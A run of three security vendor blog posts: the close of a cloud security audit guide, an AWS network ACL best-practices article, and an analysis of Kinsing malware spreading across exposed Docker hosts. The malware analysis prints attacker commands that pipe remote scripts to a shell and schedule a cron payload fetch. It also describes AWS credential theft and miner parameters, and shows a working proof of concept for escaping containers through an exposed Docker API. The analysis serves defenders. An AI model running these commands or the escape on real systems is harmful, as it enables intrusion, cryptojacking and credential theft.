confidentiality, integrity, and availability. How Is a Cloud Security Audit Conducted? The exact audit process varies depending on the specific goals and scope. Typically, an independent third party performs the audit. It inspects a cloud vendor’s security posture. It assesses how the CSP implements security best practices and whether it adheres to industry standards. It also evaluates performance against specific benchmarks set before the audit. Here is a general overview of the audit process: Define the scope: The first step is to define the scope of the audit. This includes listing the CSPs, security controls, processes, and regulations to be assessed. Plan the audit: The next step is to plan the audit. This involves establishing the audit team, a timeline, and an audit plan. This plan outlines the specific tasks to be performed and the evaluation criteria. Collect information: The auditor can collect information using various techniques. This includes analytics and security tools, physical inspections, questioning, and observation. Review and analyze: The auditor reviews all the information to evaluate the security posture. Create an audit report: An audit report summarizes findings and lists any issues. It is presented to company management at an audit briefing. The report also provides actions for improvement. Take action: Companies form a team to address issues in the audit report. This team performs remediation actions. The audit process could take 12 weeks to complete. However, it could take longer for businesses to complete the recommended remediation tasks. The schedule may be extended if a gap analysis is required. Businesses can speed up the audit process using automated security tools . This software quickly provides a unified view of all security risks across multiple cloud vendors. Some CSPs, like Amazon Web Services (AWS) and Microsoft Azure, also offer auditing tools. These tools are exclusive to each specific platform. The price of a cloud audit varies based on its scope, the size of the organization, and the number of cloud platforms. For example, auditing one vendor could take four or five weeks. But a complex web with multiple vendors could take more than 12 weeks. 6 Fundamental Steps of a Cloud Security Audit Six crucial steps must be performed in a cloud audit: 1. Evaluate security posture Evaluate the security posture of the cloud system . This includes security controls, policies, procedures, documentation, and incident response plans. The auditor can interview IT staff, cloud vendor staff, and other stakeholders to collect evidence about information systems. Screenshots and paperwork are also used as proof. After this process, the auditor analyzes the evidence. They check if existing procedures meet industry guidelines, like the ones provided by Cloud Security Alliance (CSA). 2. Define the attack surface An attack surface includes all possible points, or attack vectors, through which unauthorized users can access and exploit a system. Since cloud solutions are so complex, this can be challenging. Organizations must use cloud monitoring and observability technologies to determine the attack surface. They must also prioritize high-risk assets and focus their remediation efforts on them. Auditors must identify all the applications and assets running within cloud instances and containers. They must check if the organization approves these or if they represent shadow IT. To protect data, all workloads within the cloud system must be standardized and have up-to-date security measures. 3. Implement robust access controls Access management breaches are a widespread security risk. Unauthorized personnel can get credentials to access sensitive cloud data using various methods. To minimize security issues related to unauthorized access, organizations must: Create comprehensive password guidelines and policies Mandate multi-factor authentication (MFA) Use the Principle of Least Privilege Access (PoLP) Restrict administrative rights 4. Strict data sharing standards Organizations must install strong standards for external data access and sharing. These standards dictate how data is viewed and accessed in shared drives, calendars, and folders. Start with restrictive standards and then loosen up restrictions when necessary. External access should not be provided to files and folders containing sensitive data. This includes personally identifiable information (PII) and protected health information (PHI). 5. Use SIEM Security Information and Event Management (SIEM) systems can collect cloud logs in a standardized format. This allows editors to access logs and automatically generates reports necessary for different compliance standards. This helps organizations maintain compliance with industry security standards. 6. Automate patch management Regular security patches are crucial. However, many organizations and IT teams struggle with patch management. To create an efficient patch management process, organizations must: Focus on the most crucial patches first Regularly patch valuable assets using automation Add manual reviews to the automated patching process to ensure long-term security How Often Should Cloud Security Audits Be Conducted? As a general rule of thumb, audits are conducted annually or biannually. But an audit should also be performed when: Mandated by regulatory standards. For example, Level 1 businesses must pass at least one audit per year to remain PCI DSS compliant. There is a higher risk level. Organizations storing sensitive data may need more frequent audits. There are significant changes to the cloud environment. Ultimately, the frequency of audits depends on the organization’s specific needs. The Major Cloud Security Audit Challenges Here are some of the major challenges that organizations may face: Lack of visibility Cloud infrastructures can be complex with many services and applications across different providers. Each cloud vendor has their own security policies and practices. They also provide limited access to operational and forensic data required for auditing. This lack of transparency prevents auditors from accessing pertinent data. To gather all relevant data, IT operations staff must coordinate with CSPs. Auditors must also carefully choose test cases to avoid violating the CSP’s security policies. Encryption Data in the cloud is encrypted using two methods — internal or provider encryption. Internal or on-premise encryption is when organizations encrypt data before it is transferred to the cloud. Provider encryption is when the CSP handles encryption. With on-premise encryption, the primary threat comes from malicious internal actors. In the latter method, any security breach of the cloud provider’s network can harm your data. From an auditing standpoint, it is best to encrypt data and manage encryption keys internally. If the CSP handles the encryption keys, auditing becomes nearly impossible. Colocation Many cloud providers use the same physical systems for multiple user organizations. This increases the security risk. It also makes it challenging for auditors to inspect physical locations. Organizations should use cloud vendors that use mechanisms to prevent unauthorized data access. For example, a cloud vendor must prevent users from claiming administrative rights to the entire system. Lack of standardization Cloud environments have ever-increasing entities for auditors to inspect. This includes managed databases, physical hosts, virtual machines (VMs), and containers. Auditing all these entities can be difficult, especially when there are constant changes to the entities. Standardized procedures and workloads help auditors identify all critical entities within cloud systems. Cloud Security Audit Checklist Here is a cloud security audit checklist with example actions taken for each general control area: The above list is not all-inclusive. Each cloud environment and process involved in auditing it is different. Industry Standards To Guide Cloud Security Audits Industry groups have created security standards to help companies maintain their security posture. Here are the five most recognized standards for cloud compliance and auditing: CSA Security, Trust, & Assurance Registry (STAR): This is a security assurance program run by the CSA. The STAR program is built on three fundamental techniques: CSA’s Cloud Control Matrix (CCM) Consensus Assessments Initiative Questionnaire (CAIQ) CSA’s Code of Conduct for GDPR Compliance CSA also has a registry of CSPs who have completed a self-assessment of their security controls. The program includes guidelines that can be used for cloud audits. ISO/IEC 27017:2015: The ISO/IEC 27017:2015 are guidelines for information security controls in cloud computing environments. ISO/IEC 27018:2019: The ISO/IEC 27018:2019 provides guidelines for protecting PII in public cloud computing environments. MTCS SS 584: Multi-Tier Cloud Security (MTCS) SS 584 is a cloud security standard developed by the Infocomm Media Development Authority (IMDA) of Singapore. The standard has guidelines for CSPs on information security controls.Cloud customers and auditors can use it to evaluate the security posture of CSPs. CIS Foundations Benchmarks: The Center for Internet Security (CIS) Foundations Benchmarks are guidelines for securing IT systems and data. They help organizations of all sizes improve their security posture. Final Thoughts on Cloud Security Audits Cloud security audits are crucial for ensuring your cloud systems are secure and compliant. This is essential for data protection and preventing cybersecurity attacks. Auditors must use modern monitoring and CSPM tools like Prevasio to easily identify vulnerabilities in multi-vendor cloud environments. This software leads to faster audits and provides a unified view of all threats, making it easier to take relevant action. FAQs About Cloud Security Audits How do I become a cloud security auditor? To become a cloud security auditor, you need certification like the Certificate of Cloud Security Knowledge (CCSK) or Certified Cloud Security Professional (CCSP). Prior experience in IT auditing, cloud security management, and cloud risk assessment is highly beneficial. Other certifications like the Certificate of Cloud Auditing Knowledge (CCAK) by ISACA and CSA could also help. In addition, knowledge of security guidelines and compliance frameworks, including PCI DSS, ISO 27001, SOC 2, and NIST, is also required. Schedule a demo Related Articles Q1 at AlgoSec: What innovations and milestones defined our start to 2026? AlgoSec Reviews Mar 19, 2023 · 2 min read 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

  • AlgoSec | NACL best practices: How to combine security groups with network ACLs effectively

    Like all modern cloud providers, Amazon adopts the shared responsibility model for cloud security. Amazon guarantees secure... AWS NACL best practices: How to combine security groups with network ACLs effectively Prof. Avishai Wool 2 min read Prof. Avishai Wool Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 8/28/23 Published Like all modern cloud providers, Amazon adopts the shared responsibility model for cloud security. Amazon guarantees secure infrastructure for Amazon Web Services, while AWS users are responsible for maintaining secure configurations. That requires using multiple AWS services and tools to manage traffic. You’ll need to develop a set of inbound rules for incoming connections between your Amazon Virtual Private Cloud (VPC) and all of its Elastic Compute (EC2) instances and the rest of the Internet. You’ll also need to manage outbound traffic with a series of outbound rules. Your Amazon VPC provides you with several tools to do this. The two most important ones are security groups and Network Access Control Lists (NACLs). Security groups are stateful firewalls that secure inbound traffic for individual EC2 instances. Network ACLs are stateless firewalls that secure inbound and outbound traffic for VPC subnets. Managing AWS VPC security requires configuring both of these tools appropriately for your unique security risk profile. This means planning your security architecture carefully to align it the rest of your security framework. For example, your firewall rules impact the way Amazon Identity Access Management (IAM) handles user permissions. Some (but not all) IAM features can be implemented at the network firewall layer of security. Before you can manage AWS network security effectively , you must familiarize yourself with how AWS security tools work and what sets them apart. Everything you need to know about security groups vs NACLs AWS security groups explained: Every AWS account has a single default security group assigned to the default VPC in every Region. It is configured to allow inbound traffic from network interfaces assigned to the same group, using any protocol and any port. It also allows all outbound traffic using any protocol and any port. Your default security group will also allow all outbound IPv6 traffic once your VPC is associated with an IPv6 CIDR block. You can’t delete the default security group, but you can create new security groups and assign them to AWS EC2 instances. Each security group can only contain up to 60 rules, but you can set up to 2500 security groups per Region. You can associate many different security groups to a single instance, potentially combining hundreds of rules. These are all allow rules that allow traffic to flow according the ports and protocols specified. For example, you might set up a rule that authorizes inbound traffic over IPv6 for linux SSH commands and sends it to a specific destination. This could be different from the destination you set for other TCP traffic. Security groups are stateful, which means that requests sent from your instance will be allowed to flow regardless of inbound traffic rules. Similarly, VPC security groups automatically responses to inbound traffic to flow out regardless of outbound rules. However, since security groups do not support deny rules, you can’t use them to block a specific IP address from connecting with your EC2 instance. Be aware that Amazon EC2 automatically blocks email traffic on port 25 by default – but this is not included as a specific rule in your default security group. AWS NACLs explained: Your VPC comes with a default NACL configured to automatically allow all inbound and outbound network traffic. Unlike security groups, NACLs filter traffic at the subnet level. That means that Network ACL rules apply to every EC2 instance in the subnet, allowing users to manage AWS resources more efficiently. Every subnet in your VPC must be associated with a Network ACL. Any single Network ACL can be associated with multiple subnets, but each subnet can only be assigned to one Network ACL at a time. Every rule has its own rule number, and Amazon evaluates rules in ascending order. The most important characteristic of NACL rules is that they can deny traffic. Amazon evaluates these rules when traffic enters or leaves the subnet – not while it moves within the subnet. You can access more granular data on data flows using VPC flow logs. Since Amazon evaluates NACL rules in ascending order, make sure that you place deny rules earlier in the table than rules that allow traffic to multiple ports. You will also have to create specific rules for IPv4 and IPv6 traffic – AWS treats these as two distinct types of traffic, so rules that apply to one do not automatically apply to the other. Once you start customizing NACLs, you will have to take into account the way they interact with other AWS services. For example, Elastic Load Balancing won’t work if your NACL contains a deny rule excluding traffic from 0.0.0.0/0 or the subnet’s CIDR. You should create specific inclusions for services like Elastic Load Balancing, AWS Lambda, and AWS CloudWatch. You may need to set up specific inclusions for third-party APIs, as well. You can create these inclusions by specifying ephemeral port ranges that correspond to the services you want to allow. For example, NAT gateways use ports 1024 to 65535. This is the same range covered by AWS Lambda functions, but it’s different than the range used by Windows operating systems. When creating these rules, remember that unlike security groups, NACLs are stateless. That means that when responses to allowed traffic are generated, those responses are subject to NACL rules. Misconfigured NACLs deny traffic responses that should be allowed, leading to errors, reduced visibility, and potential security vulnerabilities . How to configure and map NACL associations A major part of optimizing NACL architecture involves mapping the associations between security groups and NACLs. Ideally, you want to enforce a specific set of rules at the subnet level using NACLs, and a different set of instance-specific rules at the security group level. Keeping these rulesets separate will prevent you from setting inconsistent rules and accidentally causing unpredictable performance problems. The first step in mapping NACL associations is using the Amazon VPC console to find out which NACL is associated with a particular subnet. Since NACLs can be associated with multiple subnets, you will want to create a comprehensive list of every association and the rules they contain. To find out which NACL is associated with a subnet: Open the Amazon VPC console . Select Subnets in the navigation pane. Select the subnet you want to inspect. The Network ACL tab will display the ID of the ACL associated with that network, and the rules it contains. To find out which subnets are associated with a NACL: Open the Amazon VPC console . Select Network ACLS in the navigation pane. Click over to the column entitled Associated With. Select a Network ACL from the list. Look for Subnet associations on the details pane and click on it. The pane will show you all subnets associated with the selected Network ACL. Now that you know how the difference between security groups and NACLs and you can map the associations between your subnets and NACLs, you’re ready to implement some security best practices that will help you strengthen and simplify your network architecture. 5 best practices for AWS NACL management Pay close attention to default NACLs, especially at the beginning Since every VPC comes with a default NACL, many AWS users jump straight into configuring their VPC and creating subnets, leaving NACL configuration for later. The problem here is that every subnet associated with your VPC will inherit the default NACL. This allows all traffic to flow into and out of the network. Going back and building a working security policy framework will be difficult and complicated – especially if adjustments are still being made to your subnet-level architecture. Taking time to create custom NACLs and assign them to the appropriate subnets as you go will make it much easier to keep track of changes to your security posture as you modify your VPC moving forward. Implement a two-tiered system where NACLs and security groups complement one another Security groups and NACLs are designed to complement one another, yet not every AWS VPC user configures their security policies accordingly. Mapping out your assets can help you identify exactly what kind of rules need to be put in place, and may help you determine which tool is the best one for each particular case. For example, imagine you have a two-tiered web application with web servers in one security group and a database in another. You could establish inbound NACL rules that allow external connections to your web servers from anywhere in the world (enabling port 443 connections) while strictly limiting access to your database (by only allowing port 3306 connections for MySQL). Look out for ineffective, redundant, and misconfigured deny rules Amazon recommends placing deny rules first in the sequential list of rules that your NACL enforces. Since you’re likely to enforce multiple deny rules per NACL (and multiple NACLs throughout your VPC), you’ll want to pay close attention to the order of those rules, looking for conflicts and misconfigurations that will impact your security posture. Similarly, you should pay close attention to the way security group rules interact with your NACLs. Even misconfigurations that are harmless from a security perspective may end up impacting the performance of your instance, or causing other problems. Regularly reviewing your rules is a good way to prevent these mistakes from occurring. Limit outbound traffic to the required ports or port ranges When creating a new NACL, you have the ability to apply inbound or outbound restrictions. There may be cases where you want to set outbound rules that allow traffic from all ports. Be careful, though. This may introduce vulnerabilities into your security posture. It’s better to limit access to the required ports, or to specify the corresponding port range for outbound rules. This establishes the principle of least privilege to outbound traffic and limits the risk of unauthorized access that may occur at the subnet level. Test your security posture frequently and verify the results How do you know if your particular combination of security groups and NACLs is optimal? Testing your architecture is a vital step towards making sure you haven’t left out any glaring vulnerabilities. It also gives you a good opportunity to address misconfiguration risks. This doesn’t always mean actively running penetration tests with experienced red team consultants, although that’s a valuable way to ensure best-in-class security. It also means taking time to validate your rules by running small tests with an external device. Consider using AWS flow logs to trace the way your rules direct traffic and using that data to improve your work. How to diagnose security group rules and NACL rules with flow logs Flow logs allow you to verify whether your firewall rules follow security best practices effectively. You can follow data ingress and egress and observe how data interacts with your AWS security rule architecture at each step along the way. This gives you clear visibility into how efficient your route tables are, and may help you configure your internet gateways for optimal performance. Before you can use the Flow Log CLI, you will need to create an IAM role that includes a policy granting users the permission to create, configure, and delete flow logs. Flow logs are available at three distinct levels, each accessible through its own console: Network interfaces VPCs Subnets You can use the ping command from an external device to test the way your instance’s security group and NACLs interact. Your security group rules (which are stateful) will allow the response ping from your instance to go through. Your NACL rules (which are stateless) will not allow the outbound ping response to travel back to your device. You can look for this activity through a flow log query. Here is a quick tutorial on how to create a flow log query to check your AWS security policies. First you’ll need to create a flow log in the AWS CLI. This is an example of a flow log query that captures all rejected traffic for a specified network interface. It delivers the flow logs to a CloudWatch log group with permissions specified in the IAM role: aws ec2 create-flow-logs \ –resource-type NetworkInterface \ –resource-ids eni-1235b8ca123456789 \ –traffic-type ALL \ –log-group-name my-flow-logs \ –deliver-logs-permission-arn arn:aws:iam::123456789101:role/publishFlowLogs Assuming your test pings represent the only traffic flowing between your external device and EC2 instance, you’ll get two records that look like this: 2 123456789010 eni-1235b8ca123456789 203.0.113.12 172.31.16.139 0 0 1 4 336 1432917027 1432917142 ACCEPT OK 2 123456789010 eni-1235b8ca123456789 172.31.16.139 203.0.113.12 0 0 1 4 336 1432917094 1432917142 REJECT OK To parse this data, you’ll need to familiarize yourself with flow log syntax. Default flow log records contain 14 arguments, although you can also expand custom queries to return more than double that number: Version tells you the version currently in use. Default flow logs requests use Version 2. Expanded custom requests may use Version 3 or 4. Account-id tells you the account ID of the owner of the network interface that traffic is traveling through. The record may display as unknown if the network interface is part of an AWS service like a Network Load Balancer. Interface-id shows the unique ID of the network interface for the traffic currently under inspection. Srcaddr shows the source of incoming traffic, or the address of the network interface for outgoing traffic. In the case of IPv4 addresses for network interfaces, it is always its private IPv4 address. Dstaddr shows the destination of outgoing traffic, or the address of the network interface for incoming traffic. In the case of IPv4 addresses for network interfaces, it is always its private IPv4 address. Srcport is the source port for the traffic under inspection. Dstport is the destination port for the traffic under inspection. Protocol refers to the corresponding IANA traffic protocol number . Packets describes the number of packets transferred. Bytes describes the number of bytes transferred. Start shows the start time when the first data packet was received. This could be up to one minute after the network interface transmitted or received the packet. End shows the time when the last data packet was received. This can be up to one minutes after the network interface transmitted or received the data packet. Action describes what happened to the traffic under inspection: ACCEPT means that traffic was allowed to pass. REJECT means the traffic was blocked, typically by security groups or NACLs. Log-status confirms the status of the flow log: OK means data is logging normally. NODATA means no network traffic to or from the network interface was detected during the specified interval. SKIPDATA means some flow log records are missing, usually due to internal capacity restraints or other errors. Going back to the example above, the flow log output shows that a user sent a command from a device with the IP address 203.0.113.12 to the network interface’s private IP address, which is 172.31.16.139. The security group’s inbound rules allowed the ICMP traffic to travel through, producing an ACCEPT record. However, the NACL did not let the ping response go through, because it is stateless. This generated the REJECT record that followed immediately after. If you configure your NACL to permit output ICMP traffic and run this test again, the second flow log record will change to ACCEPT. azon Web Services (AWS) is one of the most popular options for organizations looking to migrate their business applications to the cloud. It’s easy to see why: AWS offers high capacity, scalable and cost-effective storage, and a flexible, shared responsibility approach to security. Essentially, AWS secures the infrastructure, and you secure whatever you run on that infrastructure. However, this model does throw up some challenges. What exactly do you have control over? How can you customize your AWS infrastructure so that it isn’t just secure today, but will continue delivering robust, easily managed security in the future? The basics: security groups AWS offers virtual firewalls to organizations, for filtering traffic that crosses their cloud network segments. The AWS firewalls are managed using a concept called Security Groups. These are the policies, or lists of security rules, applied to an instance – a virtualized computer in the AWS estate. AWS Security Groups are not identical to traditional firewalls, and they have some unique characteristics and functionality that you should be aware of, and we’ve discussed them in detail in video lesson 1: the fundamentals of AWS Security Groups , but the crucial points to be aware of are as follows. First, security groups do not deny traffic – that is, all the rules in security groups are positive, and allow traffic. Second, while security group rules can be set to specify a traffic source, or a destination, they cannot specify both on the same rule. This is because AWS always sets the unspecified side (source or destination) as the instance to which the group is applied. Finally, single security groups can be applied to multiple instances, or multiple security groups can be applied to a single instance: AWS is very flexible. This flexibility is one of the unique benefits of AWS, allowing organizations to build bespoke security policies across different functions and even operating systems, mixing and matching them to suit their needs. Adding Network ACLs into the mix To further enhance and enrich its security filtering capabilities AWS also offers a feature called Network Access Control Lists (NACLs). Like security groups, each NACL is a list of rules, but there are two important differences between NACLs and security groups. The first difference is that NACLs are not directly tied to instances, but are tied with the subnet within your AWS virtual private cloud that contains the relevant instance. This means that the rules in a NACL apply to all of the instances within the subnet, in addition to all the rules from the security groups. So a specific instance inherits all the rules from the security groups associated with it, plus the rules associated with a NACL which is optionally associated with a subnet containing that instance. As a result NACLs have a broader reach, and affect more instances than a security group does. The second difference is that NACLs can be written to include an explicit action, so you can write ‘deny’ rules – for example to block traffic from a particular set of IP addresses which are known to be compromised. The ability to write ‘deny’ actions is a crucial part of NACL functionality. It’s all about the order As a consequence, when you have the ability to write both ‘allow’ rules and ‘deny’ rules, the order of the rules now becomes important. If you switch the order of the rules between a ‘deny’ and ‘allow’ rule, then you’re potentially changing your filtering policy quite dramatically. To manage this, AWS uses the concept of a ‘rule number’ within each NACL. By specifying the rule number, you can identify the correct order of the rules for your needs. You can choose which traffic you deny at the outset, and which you then actively allow. As such, with NACLs you can manage security tasks in a way that you cannot do with security groups alone. However, we did point out earlier that an instance inherits security rules from both the security groups, and from the NACLs – so how do these interact? The order by which rules are evaluated is this; For inbound traffic, AWS’s infrastructure first assesses the NACL rules. If traffic gets through the NACL, then all the security groups that are associated with that specific instance are evaluated, and the order in which this happens within and among the security groups is unimportant because they are all ‘allow’ rules. For outbound traffic, this order is reversed: the traffic is first evaluated against the security groups, and then finally against the NACL that is associated with the relevant subnet. You can see me explain this topic in person in my new whiteboard video: Schedule a demo Related Articles Q1 at AlgoSec: What innovations and milestones defined our start to 2026? AlgoSec Reviews Mar 19, 2023 · 2 min read 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

  • AlgoSec | Kinsing Punk: An Epic Escape From Docker Containers

    We all remember how a decade ago, Windows password trojans were harvesting credentials that some email or FTP clients kept on disk in an... Cloud Security Kinsing Punk: An Epic Escape From Docker Containers Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 8/22/20 Published We all remember how a decade ago, Windows password trojans were harvesting credentials that some email or FTP clients kept on disk in an unencrypted form. Network-aware worms were brute-forcing the credentials of weakly-restricted shares to propagate across networks. Some of them were piggy-backing on Windows Task Scheduler to activate remote payloads. Today, it’s déjà vu all over again. Only in the world of Linux. As reported earlier this week by Cado Security, a new fork of Kinsing malware propagates across misconfigured Docker platforms and compromises them with a coinminer. In this analysis, we wanted to break down some of its components and get a closer look into its modus operandi. As it turned out, some of its tricks, such as breaking out of a running Docker container, are quite fascinating. Let’s start from its simplest trick — the credentials grabber. AWS Credentials Grabber If you are using cloud services, chances are you may have used Amazon Web Services (AWS). Once you log in to your AWS Console, create a new IAM user, and configure its type of access to be Programmatic access, the console will provide you with Access key ID and Secret access key of the newly created IAM user. You will then use those credentials to configure the AWS Command Line Interface ( CLI ) with the aws configure command. From that moment on, instead of using the web GUI of your AWS Console, you can achieve the same by using AWS CLI programmatically. There is one little caveat, though. AWS CLI stores your credentials in a clear text file called ~/.aws/credentials . The documentation clearly explains that: The AWS CLI stores sensitive credential information that you specify with aws configure in a local file named credentials, in a folder named .aws in your home directory. That means, your cloud infrastructure is now as secure as your local computer. It was a matter of time for the bad guys to notice such low-hanging fruit, and use it for their profit. As a result, these files are harvested for all users on the compromised host and uploaded to the C2 server. Hosting For hosting, the malware relies on other compromised hosts. For example, dockerupdate[.]anondns[.]net uses an obsolete version of SugarCRM , vulnerable to exploits. The attackers have compromised this server, installed a webshell b374k , and then uploaded several malicious files on it, starting from 11 July 2020. A server at 129[.]211[.]98[.]236 , where the worm hosts its own body, is a vulnerable Docker host. According to Shodan , this server currently hosts a malicious Docker container image system_docker , which is spun with the following parameters: ./nigix –tls-url gulf.moneroocean.stream:20128 -u [MONERO_WALLET] -p x –currency monero –httpd 8080 A history of the executed container images suggests this host has executed multiple malicious scripts under an instance of alpine container image: chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]116[.]62[.]203[.]85:12222/web/xxx.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]106[.]12[.]40[.]198:22222/test/yyy.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:12345/zzz.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:26573/test/zzz.sh | sh’ Docker Lan Pwner A special module called docker lan pwner is responsible for propagating the infection across other Docker hosts. To understand the mechanism behind it, it’s important to remember that a non-protected Docker host effectively acts as a backdoor trojan. Configuring Docker daemon to listen for remote connections is easy. All it requires is one extra entry -H tcp://127.0.0.1:2375 in systemd unit file or daemon.json file. Once configured and restarted, the daemon will expose port 2375 for remote clients: $ sudo netstat -tulpn | grep dockerd tcp 0 0 127.0.0.1:2375 0.0.0.0:* LISTEN 16039/dockerd To attack other hosts, the malware collects network segments for all network interfaces with the help of ip route show command. For example, for an interface with an assigned IP 192.168.20.25 , the IP range of all available hosts on that network could be expressed in CIDR notation as 192.168.20.0/24 . For each collected network segment, it launches masscan tool to probe each IP address from the specified segment, on the following ports: Port Number Service Name Description 2375 docker Docker REST API (plain text) 2376 docker-s Docker REST API (ssl) 2377 swarm RPC interface for Docker Swarm 4243 docker Old Docker REST API (plain text) 4244 docker-basic-auth Authentication for old Docker REST API The scan rate is set to 50,000 packets/second. For example, running masscan tool over the CIDR block 192.168.20.0/24 on port 2375 , may produce an output similar to: $ masscan 192.168.20.0/24 -p2375 –rate=50000 Discovered open port 2375/tcp on 192.168.20.25 From the output above, the malware selects a word at the 6th position, which is the detected IP address. Next, the worm runs zgrab — a banner grabber utility — to send an HTTP request “/v1.16/version” to the selected endpoint. For example, sending such request to a local instance of a Docker daemon results in the following response: Next, it applies grep utility to parse the contents returned by the banner grabber zgrab , making sure the returned JSON file contains either “ApiVersion” or “client version 1.16” string in it. The latest version if Docker daemon will have “ApiVersion” in its banner. Finally, it will apply jq — a command-line JSON processor — to parse the JSON file, extract “ip” field from it, and return it as a string. With all the steps above combined, the worm simply returns a list of IP addresses for the hosts that run Docker daemon, located in the same network segments as the victim. For each returned IP address, it will attempt to connect to the Docker daemon listening on one of the enumerated ports, and instruct it to download and run the specified malicious script: docker -H tcp://[IP_ADDRESS]:[PORT] run –rm -v /:/mnt alpine chroot /mnt /bin/sh -c “curl [MALICIOUS_SCRIPT] | bash; …” The malicious script employed by the worm allows it to execute the code directly on the host, effectively escaping the boundaries imposed by the Docker containers. We’ll get down to this trick in a moment. For now, let’s break down the instructions passed to the Docker daemon. The worm instructs the remote daemon to execute a legitimate alpine image with the following parameters: –rm switch will cause Docker to automatically remove the container when it exits -v /:/mnt is a bind mount parameter that instructs Docker runtime to mount the host’s root directory / within the container as /mnt chroot /mnt will change the root directory for the current running process into /mnt , which corresponds to the root directory / of the host a malicious script to be downloaded and executed Escaping From the Docker Container The malicious script downloaded and executed within alpine container first checks if the user’s crontab — a special configuration file that specifies shell commands to run periodically on a given schedule — contains a string “129[.]211[.]98[.]236” : crontab -l | grep -e “129[.]211[.]98[.]236” | grep -v grep If it does not contain such string, the script will set up a new cron job with: echo “setup cron” ( crontab -l 2>/dev/null echo “* * * * * $LDR http[:]//129[.]211[.]98[.]236/xmr/mo/mo.jpg | bash; crontab -r > /dev/null 2>&1” ) | crontab – The code snippet above will suppress the no crontab for username message, and create a new scheduled task to be executed every minute . The scheduled task consists of 2 parts: to download and execute the malicious script and to delete all scheduled tasks from the crontab . This will effectively execute the scheduled task only once, with a one minute delay. After that, the container image quits. There are two important moments associated with this trick: as the Docker container’s root directory was mapped to the host’s root directory / , any task scheduled inside the container will be automatically scheduled in the host’s root crontab as Docker daemon runs as root, a remote non-root user that follows such steps will create a task that is scheduled in the root’s crontab , to be executed as root Building PoC To test this trick in action, let’s create a shell script that prints “123” into a file _123.txt located in the root directory / . echo “setup cron” ( crontab -l 2>/dev/null echo “* * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1” ) | crontab – Next, let’s pass this script encoded in base64 format to the Docker daemon running on the local host: docker -H tcp://127.0.0.1:2375 run –rm -v /:/mnt alpine chroot /mnt /bin/sh -c “echo ‘[OUR_BASE_64_ENCODED_SCRIPT]’ | base64 -d | bash” Upon execution of this command, the alpine image starts and quits. This can be confirmed with the empty list of running containers: $ docker -H tcp://127.0.0.1:2375 ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES An important question now is if the crontab job was created inside the (now destroyed) docker container or on the host? If we check the root’s crontab on the host, it will tell us that the task was scheduled for the host’s root, to be run on the host: $ sudo crontab -l * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1 A minute later, the file _123.txt shows up in the host’s root directory, and the scheduled entry disappears from the root’s crontab on the host: $ sudo crontab -l no crontab for root This simple exercise proves that while the malware executes the malicious script inside the spawned container, insulated from the host, the actual task it schedules is created and then executed on the host. By using the cron job trick, the malware manipulates the Docker daemon to execute malware directly on the host! Malicious Script Upon escaping from container to be executed directly on a remote compromised host, the malicious script will perform the following actions: Schedule a demo Related Articles Q1 at AlgoSec: What innovations and milestones defined our start to 2026? AlgoSec Reviews Mar 19, 2023 · 2 min read 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

bottom of page